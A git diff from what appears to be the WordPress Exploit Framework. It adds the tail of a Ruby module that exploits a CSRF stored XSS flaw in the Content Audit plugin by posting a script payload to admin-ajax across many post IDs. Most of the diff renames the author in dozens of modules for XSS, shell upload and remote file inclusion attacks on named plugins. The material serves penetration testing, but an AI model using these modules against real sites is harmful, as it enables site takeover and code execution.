+        payload will be stored and executed when the ID is eventually assigned to
+        a new post / page.
+      ),
+      desc_preformatted: true,
+      author: [
+        'Tom Adams', # Disclosure
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8915'],
+        ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/73'],
+        ['URL', 'https://security.dxw.com/advisories/csrf-xss-content-audit/']
+      ],
+      date: 'Aug 21 2017'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'first_post_id',
+        desc: 'The first post ID to store the payload against',
+        required: true,
+        default: 1
+      ),
+      IntegerOption.new(
+        name: 'last_post_id',
+        desc: 'The last post ID to store the payload against',
+        required: true,
+        default: 100
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('content-audit', '1.9.2')
+  end
+
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+
+  def first_post_id
+    normalized_option_value('first_post_id')
+  end
+
+  def last_post_id
+    normalized_option_value('last_post_id')
+  end
+
+  def initial_script
+    fields = {
+      'action'                         => 'content_audit_save_bulk_edit',
+      '_content_audit_owner'           => Utility::Text.rand_alphanumeric(10),
+      '_content_audit_expiration_date' => (Date.today + 7).strftime('%Y-%m-%d'),
+      '_content_audit_notes'           => "<script>#{xss_ascii_encoded_include_script}<\\/script>"
+    }
+
+    Array(first_post_id..last_post_id).each_with_index { |id, index| fields["post_ids[#{index}]"] = id }
+    create_basic_post_script vulnerable_url, fields
+  end
+end
diff --git a/modules/exploits/content_grabber_reflected_xss_shell_upload.rb b/modules/exploits/content_grabber_reflected_xss_shell_upload.rb
index a1bdee9..63ebdf6 100644
--- a/modules/exploits/content_grabber_reflected_xss_shell_upload.rb
+++ b/modules/exploits/content_grabber_reflected_xss_shell_upload.rb
@@ -9,10 +9,10 @@ def initialize
     update_info(
       name: 'Content Grabber <= 1.0 Reflected XSS Shell Upload',
       author: [
-        'Morten Nørtoft',                    # Discovery and disclosure
-        'Kenneth Jepsen',                    # Discovery and disclosure
-        'Mikkel Vej',                        # Discovery and disclosure
-        'phyushin <phyushin[at]phyubox.com>' # WPXF module
+        'Morten Nørtoft',                     # Discovery and disclosure
+        'Kenneth Jepsen',                     # Discovery and disclosure
+        'Mikkel Vej',                         # Discovery and disclosure
+        'phyushin <phyushin[at]phyubox.com>'  # WPXF module
       ],
       references: [
         ['WPVDB', '8134'],
diff --git a/modules/exploits/content_slide_reflected_xss_shell_upload.rb b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
index b7bd0db..fb32236 100644
--- a/modules/exploits/content_slide_reflected_xss_shell_upload.rb
+++ b/modules/exploits/content_slide_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Content Slide Reflected XSS Shell Upload',
       author: [
-        'Tom Adams (dxw)',                    # Disclosure
-        'Paul Williams <phyushin@phyubox.com' # WPXF module
+        'Tom Adams (dxw)',                     # Disclosure
+        'Paul Williams <phyushin@phyubox.com'  # WPXF module
       ],
       references: [
         ['WPVDB', '7908'],
diff --git a/modules/exploits/count_per_day_reflected_xss_shell_upload.rb b/modules/exploits/count_per_day_reflected_xss_shell_upload.rb
index d6f1f19..f936359 100644
--- a/modules/exploits/count_per_day_reflected_xss_shell_upload.rb
+++ b/modules/exploits/count_per_day_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Count Per Day <= 3.5.4 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Discovery
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8597'],
diff --git a/modules/exploits/creative_contact_form_shell_upload.rb b/modules/exploits/creative_contact_form_shell_upload.rb
index da81d60..ad1f25a 100644
--- a/modules/exploits/creative_contact_form_shell_upload.rb
+++ b/modules/exploits/creative_contact_form_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Gianni Angelozzi',               # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Gianni Angelozzi', # Vulnerability discovery
+        'rastating'         # WPXF module
       ],
       references: [
         ['EDB', '35057'],
diff --git a/modules/exploits/csv_import_reflected_xss_shell_upload.rb b/modules/exploits/csv_import_reflected_xss_shell_upload.rb
index de0d427..71879e3 100644
--- a/modules/exploits/csv_import_reflected_xss_shell_upload.rb
+++ b/modules/exploits/csv_import_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'CSV Import 1.0 Reflected XSS Shell Upload',
       author: [
-        'Rahul Pratap Singh',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Rahul Pratap Singh', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8395'],
diff --git a/modules/exploits/custom_metas_reflected_xss_shell_upload.rb b/modules/exploits/custom_metas_reflected_xss_shell_upload.rb
index 40d888e..91ac214 100644
--- a/modules/exploits/custom_metas_reflected_xss_shell_upload.rb
+++ b/modules/exploits/custom_metas_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Custom Metas <= 1.5.1 Reflected XSS Shell Upload',
       author: [
-        'Shravan Kumar',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Shravan Kumar', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8456'],
diff --git a/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb b/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb
index 99f98bf..2a4fc35 100644
--- a/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb
+++ b/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Defa Online Image Protector <= 3.3 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8454'],
diff --git a/modules/exploits/delete_all_comments_shell_upload.rb b/modules/exploits/delete_all_comments_shell_upload.rb
index 4c9cdbc..60f6c23 100644
--- a/modules/exploits/delete_all_comments_shell_upload.rb
+++ b/modules/exploits/delete_all_comments_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Delete All Comments Unauthenticated Shell Upload',
       author: [
-        'NinTechNet',                     # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'NinTechNet', # Discovery and disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8694'],
diff --git a/modules/exploits/designfolio_plus_shell_upload.rb b/modules/exploits/designfolio_plus_shell_upload.rb
index cde11a4..0179181 100644
--- a/modules/exploits/designfolio_plus_shell_upload.rb
+++ b/modules/exploits/designfolio_plus_shell_upload.rb
@@ -11,8 +11,8 @@ def initialize
     update_info(
       name: 'DesignFolio+ Theme Unauthenticated Shell Upload',
       author: [
-        'CrashBandicot',                  # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'CrashBandicot', # Vulnerability disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '7880'],
diff --git a/modules/exploits/download_manager_reflected_xss_shell_upload.rb b/modules/exploits/download_manager_reflected_xss_shell_upload.rb
index 14ce42e..da56aa7 100644
--- a/modules/exploits/download_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/download_manager_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Download Manager <= 2.9.51 Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8850'],
diff --git a/modules/exploits/dw_question_answer_stored_xss_shell_upload.rb b/modules/exploits/dw_question_answer_stored_xss_shell_upload.rb
index e4e1ace..96fc077 100644
--- a/modules/exploits/dw_question_answer_stored_xss_shell_upload.rb
+++ b/modules/exploits/dw_question_answer_stored_xss_shell_upload.rb
@@ -15,8 +15,8 @@ def initialize
             'create a new admin user and use the new credentials to '\
             'upload and execute a payload when an admin views the page.',
       author: [
-        'Rahul Pratap Singh',             # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Rahul Pratap Singh', # Vulnerability discovery
+        'rastating'           # WPXF module
       ],
       references: [
         ['URL', 'https://0x62626262.wordpress.com/2016/03/11/dw-question-answer-xss-vulnerability/'],
diff --git a/modules/exploits/dwnldr_xss_shell_upload.rb b/modules/exploits/dwnldr_xss_shell_upload.rb
index 0ec370e..946ef9e 100644
--- a/modules/exploits/dwnldr_xss_shell_upload.rb
+++ b/modules/exploits/dwnldr_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Dwnldr 1.0 XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+        'rastating'  # Disclosure + WPXF module
       ],
       references: [
         ['WPVDB', '8556'],
diff --git a/modules/exploits/easy_cart_shell_upload.rb b/modules/exploits/easy_cart_shell_upload.rb
index 3cb4558..9cbad7a 100644
--- a/modules/exploits/easy_cart_shell_upload.rb
+++ b/modules/exploits/easy_cart_shell_upload.rb
@@ -27,8 +27,8 @@ def initialize
             'will setup a user called "demouser" with a preset password '\
             'of "demouser".',
       author: [
-        'Kacper Szurek',                  # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Vulnerability disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '7745']
diff --git a/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb b/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb
index 5e5aace..368353f 100644
--- a/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb
+++ b/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Easy Contact Form Builder <= 1.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8452'],
diff --git a/modules/exploits/email_users_reflected_xss_shell_upload.rb b/modules/exploits/email_users_reflected_xss_shell_upload.rb
index 41cafd6..a266491 100644
--- a/modules/exploits/email_users_reflected_xss_shell_upload.rb
+++ b/modules/exploits/email_users_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Email Users <= 4.8.2 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8549'],
diff --git a/modules/exploits/embed_comment_images_stored_xss_shell_upload.rb b/modules/exploits/embed_comment_images_stored_xss_shell_upload.rb
index 21b2061..faefdc7 100644
--- a/modules/exploits/embed_comment_images_stored_xss_shell_upload.rb
+++ b/modules/exploits/embed_comment_images_stored_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Embed Images in Comments <= 0.5 Unauthenticated Stored XSS Shell Upload',
       author: [
-        'Gennady',                        # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Gennady',   # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8891']
diff --git a/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb b/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
index ca8d1be..134b74a 100644
--- a/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
+++ b/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Enhanced Tootip Glossary <= 3.3.4 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8494'],
diff --git a/modules/exploits/estatik_v2.2.5_shell_upload.rb b/modules/exploits/estatik_v2.2.5_shell_upload.rb
index 21103bc..95399a0 100644
--- a/modules/exploits/estatik_v2.2.5_shell_upload.rb
+++ b/modules/exploits/estatik_v2.2.5_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Estatik <= 2.2.5 Unauthenticated Shell Upload',
       author: [
-        'White Fir Design',               # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8593'],
diff --git a/modules/exploits/events_made_easy_reflected_xss_shell_upload.rb b/modules/exploits/events_made_easy_reflected_xss_shell_upload.rb
index 9ff8c70..a3b4a52 100644
--- a/modules/exploits/events_made_easy_reflected_xss_shell_upload.rb
+++ b/modules/exploits/events_made_easy_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
       author: [
-        'Job Diesveld',                   # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Job Diesveld', # Discovery
+        'rastating'     # WPXF module
       ],
       references: [
         ['WPVDB', '8595'],
diff --git a/modules/exploits/evo_theme_shell_upload.rb b/modules/exploits/evo_theme_shell_upload.rb
index 0d68667..4e63fe7 100644
--- a/modules/exploits/evo_theme_shell_upload.rb
+++ b/modules/exploits/evo_theme_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Divya',                          # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36611']
diff --git a/modules/exploits/faq_wd_reflected_xss_shell_upload.rb b/modules/exploits/faq_wd_reflected_xss_shell_upload.rb
index de6e9e6..98c8240 100644
--- a/modules/exploits/faq_wd_reflected_xss_shell_upload.rb
+++ b/modules/exploits/faq_wd_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'FAQ WD <= 1.0.14 Reflected XSS Shell Upload',
       author: [
-        'Shravan Kumar',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Shravan Kumar', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8455'],
diff --git a/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb b/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb
index 074b47e..ddbd93c 100644
--- a/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb
+++ b/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb
@@ -22,8 +22,8 @@ def initialize
         to the target that will initiate the download and execution of the payload.
       ),
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8092'],
diff --git a/modules/exploits/flickr_picture_backup_rfi_shell_upload.rb b/modules/exploits/flickr_picture_backup_rfi_shell_upload.rb
index a0ba096..c8d1fd0 100644
--- a/modules/exploits/flickr_picture_backup_rfi_shell_upload.rb
+++ b/modules/exploits/flickr_picture_backup_rfi_shell_upload.rb
@@ -19,8 +19,8 @@ def initialize
         to the target that will initiate the download and execution of the payload.
       ),
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8803'],
diff --git a/modules/exploits/formbuilder_reflected_xss_shell_upload.rb b/modules/exploits/formbuilder_reflected_xss_shell_upload.rb
index 9701c95..15fc102 100644
--- a/modules/exploits/formbuilder_reflected_xss_shell_upload.rb
+++ b/modules/exploits/formbuilder_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'FormBuilder <= 1.0.5 Reflected XSS Shell Upload',
       author: [
-        'Peter Ganzevles',                # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Peter Ganzevles', # Discovery
+        'rastating'        # WPXF module
       ],
       references: [
         ['WPVDB', '8596'],
diff --git a/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb b/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb
index ec2f9b7..c49aa11 100644
--- a/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb
+++ b/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: '404 to 301 <= 2.3.0 XSS Shell Upload',
       author: [
-        'ldionmarcil',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'ldionmarcil', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8611'],
diff --git a/modules/exploits/front_end_file_upload_and_manager_shell_upload.rb b/modules/exploits/front_end_file_upload_and_manager_shell_upload.rb
index 3799b19..2576d38 100644
--- a/modules/exploits/front_end_file_upload_and_manager_shell_upload.rb
+++ b/modules/exploits/front_end_file_upload_and_manager_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Front End File Upload and Manager Unauthenticated Shell Upload',
       author: [
-        'White Fir Design',               # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8632'],
diff --git a/modules/exploits/gallery_pro_theme_shell_upload.rb b/modules/exploits/gallery_pro_theme_shell_upload.rb
index 8d5226b..9cb263f 100644
--- a/modules/exploits/gallery_pro_theme_shell_upload.rb
+++ b/modules/exploits/gallery_pro_theme_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Divya',                          # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36611']
diff --git a/modules/exploits/google_analytics_dashboard_reflected_xss_shell_upload.rb b/modules/exploits/google_analytics_dashboard_reflected_xss_shell_upload.rb
index f18f35f..cf4520b 100644
--- a/modules/exploits/google_analytics_dashboard_reflected_xss_shell_upload.rb
+++ b/modules/exploits/google_analytics_dashboard_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Google Analytics Dashboard <= 2.1.1 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8747'],
diff --git a/modules/exploits/google_maps_reflected_xss_shell_upload.rb b/modules/exploits/google_maps_reflected_xss_shell_upload.rb
index 5965383..1ca5ea1 100644
--- a/modules/exploits/google_maps_reflected_xss_shell_upload.rb
+++ b/modules/exploits/google_maps_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Google Maps <= 2.1.3 Reflected XSS Shell Upload',
       author: [
-        'Julien Rentrop',                 # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Julien Rentrop', # Discovery
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8600'],
diff --git a/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb b/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb
index b49a8cd..69b37e9 100644
--- a/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb
+++ b/modules/exploits/gravity_forms_v1.8.19_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload',
       author: [
-        'Sucuri.net',                     # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sucuri.net', # Discovery and disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '7820']
diff --git a/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb b/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
index ff301c1..acc777a 100644
--- a/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
+++ b/modules/exploits/gravity_forms_v1.9.15.11_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Gravity Forms <= 1.9.15.11 Reflected XSS Shell Upload',
       author: [
-        'Henri Salo',                     # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Henri Salo', # Discovery
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8400'],
diff --git a/modules/exploits/gwolle_guestbook_remote_file_inclusion.rb b/modules/exploits/gwolle_guestbook_remote_file_inclusion.rb
index 72eaa48..f17312d 100644
--- a/modules/exploits/gwolle_guestbook_remote_file_inclusion.rb
+++ b/modules/exploits/gwolle_guestbook_remote_file_inclusion.rb
@@ -15,7 +15,7 @@ def initialize
             'is enabled (disabled by default).',
       author: [
         'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>'         # WPXF module
+        'rastating'                               # WPXF module
       ],
       references: [
         ['CVE', '2015-8351'],
diff --git a/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb b/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb
index cf78c3e..eef1d14 100644
--- a/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb
+++ b/modules/exploits/gwolle_guestbook_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Gwolle Guestbook <= 2.1.0 Stored XSS Shell Upload',
       author: [
-        'Radjnies Bhansingh',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Radjnies Bhansingh', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8785'],
diff --git a/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb b/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb
index 6657f74..64eabbb 100644
--- a/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb
+++ b/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'HDW WordPress Video Gallery (HDW Tube) <= 1.2 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8449'],
diff --git a/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb b/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb
index a4c52ea..cc65073 100644
--- a/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb
+++ b/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Hero Maps Pro <= 2.1.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8447'],
diff --git a/modules/exploits/holding_pattern_shell_upload.rb b/modules/exploits/holding_pattern_shell_upload.rb
index 8ab3377..3602823 100644
--- a/modules/exploits/holding_pattern_shell_upload.rb
+++ b/modules/exploits/holding_pattern_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Alexander Borg',                 # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Alexander Borg', # Vulnerability disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['CVE', '2015-1172'],
diff --git a/modules/exploits/huge_it_image_gallery_reflected_xss_shell_upload.rb b/modules/exploits/huge_it_image_gallery_reflected_xss_shell_upload.rb
index 1de218e..0bb49af 100644
--- a/modules/exploits/huge_it_image_gallery_reflected_xss_shell_upload.rb
+++ b/modules/exploits/huge_it_image_gallery_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Huge-IT Image Gallery <= 1.7.0 Reflected XSS Shell Upload',
       author: [
-        'Kacper Szurek',                  # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Discovery and disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8387'],
diff --git a/modules/exploits/import_woocommerce_reflected_xss_shell_upload.rb b/modules/exploits/import_woocommerce_reflected_xss_shell_upload.rb
index 2b8f3a1..06f7ad4 100644
--- a/modules/exploits/import_woocommerce_reflected_xss_shell_upload.rb
+++ b/modules/exploits/import_woocommerce_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Import Woocommerce <= 1.0.1 Reflected XSS Shell Upload',
       author: [
-        'Rahul Pratap Singh',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Rahul Pratap Singh', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8397'],
diff --git a/modules/exploits/impress_listings_reflected_xss_shell_upload.rb b/modules/exploits/impress_listings_reflected_xss_shell_upload.rb
index 4a441d3..a629f46 100644
--- a/modules/exploits/impress_listings_reflected_xss_shell_upload.rb
+++ b/modules/exploits/impress_listings_reflected_xss_shell_upload.rb
@@ -15,7 +15,7 @@ def initialize
             'selected payload in the context of the web server.',
       author: [
         'Kris <https://twitter.com/@CTFKris>', # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>'      # WPXF module
+        'rastating'                            # WPXF module
       ],
       references: [
         ['WPVDB', '8370'],
diff --git a/modules/exploits/inboundio_marketing_shell_upload.rb b/modules/exploits/inboundio_marketing_shell_upload.rb
index 3f5db43..e0e81ea 100644
--- a/modules/exploits/inboundio_marketing_shell_upload.rb
+++ b/modules/exploits/inboundio_marketing_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'KedAns-Dz',                      # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'KedAns-Dz', # Vulnerability discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36478'],
diff --git a/modules/exploits/indexisto_reflected_xss_shell_upload.rb b/modules/exploits/indexisto_reflected_xss_shell_upload.rb
index b4151b0..838ccaa 100644
--- a/modules/exploits/indexisto_reflected_xss_shell_upload.rb
+++ b/modules/exploits/indexisto_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Indexisto <= 1.0.5 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8453'],
diff --git a/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb b/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb
index 717f3a4..67a5851 100644
--- a/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb
+++ b/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Infusionsoft Gravity Forms <= 1.5.11 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8440'],
diff --git a/modules/exploits/infusionsoft_shell_upload.rb b/modules/exploits/infusionsoft_shell_upload.rb
index 55d0f79..bf45a35 100644
--- a/modules/exploits/infusionsoft_shell_upload.rb
+++ b/modules/exploits/infusionsoft_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'g0blin',                         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'g0blin',    # Vulnerability discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['CVE', '2014-6446'],
diff --git a/modules/exploits/instagram_feed_csrf_stored_xss_shell_upload.rb b/modules/exploits/instagram_feed_csrf_stored_xss_shell_upload.rb
index f3927cd..7715824 100644
--- a/modules/exploits/instagram_feed_csrf_stored_xss_shell_upload.rb
+++ b/modules/exploits/instagram_feed_csrf_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Instagram Feed <= 1.4.6.2 CSRF Stored XSS Shell Upload',
       author: [
